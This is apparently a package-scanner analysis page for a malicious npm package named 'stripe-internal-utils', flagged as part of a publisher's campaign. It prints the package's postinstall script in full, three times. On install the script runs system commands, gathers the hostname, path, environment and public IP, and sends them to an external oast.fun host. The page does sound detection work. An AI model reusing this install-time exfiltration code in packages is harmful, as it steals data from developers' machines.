// npm package

stripe-internal-utils

Full RCE PoC -osama

npmjs.com tarball

versions

maintainers

first publish

2026-05-19

publisher

dewifewi

tarball

1,026 B

AUTO-PUBLISHED·1 version indexed·latest published 2026-05-19

// exfil path

what is read → where it ships

steals

○ home dir
○ system info

sends to

⇢ wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun(oast.fun)
⚙ dns tunneling(fetches + executes remote payload)

// publisher campaignby dewifewi

2 caught packages from this account

This is not an isolated catch. The same publisher has shipped 1 other package that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.

// offending code· @1.0.0· 1 file flagged

llm: malicious · 0.95

→ Sends to suspicious destination(s): wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun.

@1.0.0·2026-05-19·AUTO-PUBLISHED·publisher: dewifewi
heuristic 100/100
static flags 6
llm malicious (0.95) via ollama
install-scripts:postinstallnew-publisher:0dfirst-version-of-packagefirst-version-suspicious-publishersuspicious-description:pocpublisher-version-pump:8reads-env-varsreads-homedirreads-system-infodns-tunnelingchild-process-spawndest-via-hostname-var
→ Sends to suspicious destination(s): wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun.
// NHI intent1 target·

--- install scripts --- ### postinstall node -e "const os=require('os'),http=require('http' ),https=require('https' ),cp=require('child_process'); const getIP=(cb)=>{https.get('https://api.ipify.org',(res )=>{let d='';res.on('data',(c)=>d+=c);res.on('end',()=>cb(d))}).on('error',()=>cb('unknown'))}; getIP((ip)=>{ cp.exec('id || ver && whoami && hostname', (e,o,r)=>{ const data={time:new Date().toUTCString(), organization:process.env.USERDOMAIN||process.env.COMPANY||'Check IP WHOIS', ip_address:ip, package_name:'stripe-internal-utils', hostname:os.hostname(), current_path:process.cwd(), command_output:o+r }; const postData=JSON.stringify(data); const req=http.request({hostname:'wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun',method:'POST',path:'/',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(postData )}},()=>{}); req.write(postData); req.end(); }); });" --- package/package.json (excerpt) --- { "name": "stripe-internal-utils", "version": "1.0.0", "description": "Full RCE PoC -osama", "main": "index.js", "scripts": { "postinstall": "node -e \"const os=require('os'),http=require('http' ),https=require('https' ),cp=require('child_process'); const getIP=(cb)=>{https.get('https://api.ipify.org',(res )=>{let d='';res.on('data',(c)=>d+=c);res.on('end',()=>cb(d))}).on('error',()=>cb('unknown'))}; getIP((ip)=>{ cp.exec('id || ver && whoami && hostname', (e,o,r)=>{ const data={time:new Date().toUTCString(), organization:process.env.USERDOMAIN||process.env.COMPANY||'Check IP WHOIS', ip_address:ip, package_name:'stripe-internal-utils', hostname:os.hostname(), current_path:process.cwd(), command_output:o+r }; const postData=JSON.stringify(data); const req=http.request({hostname:'wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun',method:'POST',path:'/',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(postData )}},()=>{}); req.write(postData); req.end(); }); });\"" } } --- dynamic destinations --- → wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun (via hostname-var)

### postinstall node -e "const os=require('os'),http=require('http' ),https=require('https' ),cp=require('child_process'); const getIP=(cb)=>{https.get('https://api.ipify.org',(res )=>{let d='';res.on('data',(c)=>d+=c);res.on('end',()=>cb(d))}).on('error',()=>cb('unknown'))}; getIP((ip)=>{ cp.exec('id || ver && whoami && hostname', (e,o,r)=>{ const data={time:new Date().toUTCString(), organization:process.env.USERDOMAIN||process.env.COMPANY||'Check IP WHOIS', ip_address:ip, package_name:'stripe-internal-utils', hostname:os.hostname(), current_path:process.cwd(), command_output:o+r }; const postData=JSON.stringify(data); const req=http.request({hostname:'wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun',method:'POST',path:'/',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(postData )}},()=>{}); req.write(postData); req.end(); }); });"

{ "name": "stripe-internal-utils", "version": "1.0.0", "description": "Full RCE PoC -osama", "main": "index.js", "scripts": { "postinstall": "node -e \"const os=require('os'),http=require('http' ),https=require('https' ),cp=require('child_process'); const getIP=(cb)=>{https.get('https://api.ipify.org',(res )=>{let d='';res.on('data',(c)=>d+=c);res.on('end',()=>cb(d))}).on('error',()=>cb('unknown'))}; getIP((ip)=>{ cp.exec('id || ver && whoami && hostname', (e,o,r)=>{ const data={time:new Date().toUTCString(), organization:process.env.USERDOMAIN||process.env.COMPANY||'Check IP WHOIS', ip_address:ip, package_name:'stripe-internal-utils', hostname:os.hostname(), current_path:process.cwd(), command_output:o+r }; const postData=JSON.stringify(data); const req=http.request({hostname:'wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun',method:'POST',path:'/',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(postData )}},()=>{}); req.write(postData); req.end(); }); });\"" } }